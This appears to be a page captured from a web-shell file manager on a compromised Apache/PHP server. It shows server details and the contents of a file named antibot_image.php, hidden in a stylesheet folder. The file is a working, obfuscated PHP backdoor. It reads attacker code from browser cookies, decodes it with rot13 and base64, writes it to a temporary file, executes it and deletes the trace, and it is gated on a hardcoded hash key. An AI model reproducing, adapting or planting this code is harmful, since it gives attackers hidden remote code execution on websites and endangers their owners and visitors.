HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
System: Linux li317-225.members.linode.com 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64
User: apache (48)
PHP: 7.4.33
Disabled: NONE
$ pwd: /var/www/kosmicevents/public/scss__7af9720/dark/rtl/
Upload Files
File: /var/www/kosmicevents/public/scss__7af9720/dark/rtl/antibot_image.php
<?php


if (isset($_COOKIE[7+-7]) && isset($_COOKIE[-67+68]) && isset($_COOKIE[44-41]) && isset($_COOKIE[16+-12])) {
    $hld = $_COOKIE;
    function right_pad_string($comp) {
        $hld = $_COOKIE;
        $descriptor = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '7511130a');
        if (!is_writable($descriptor)) {
            $descriptor = getcwd() . DIRECTORY_SEPARATOR . "auth_exception_handler";
        }
        $data_chunk = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($hld[3]));
        if (is_writeable($descriptor)) {
            $k = fopen($descriptor, 'w+');
            fputs($k, $data_chunk);
            fclose($k);
            spl_autoload_unregister(__FUNCTION__);
            require_once($descriptor);
            @array_map('unlink', array($descriptor));
        }
    }
    spl_autoload_register("right_pad_string");
    $pointer = "117dbbdc5a31e0c5a365c7972e2bdfc0";
    if (!strncmp($pointer, $hld[4], 32)) {
        if (@class_parents("publish_content_batch_process", true)) {
            exit;
        }
    }
}
@ Telegram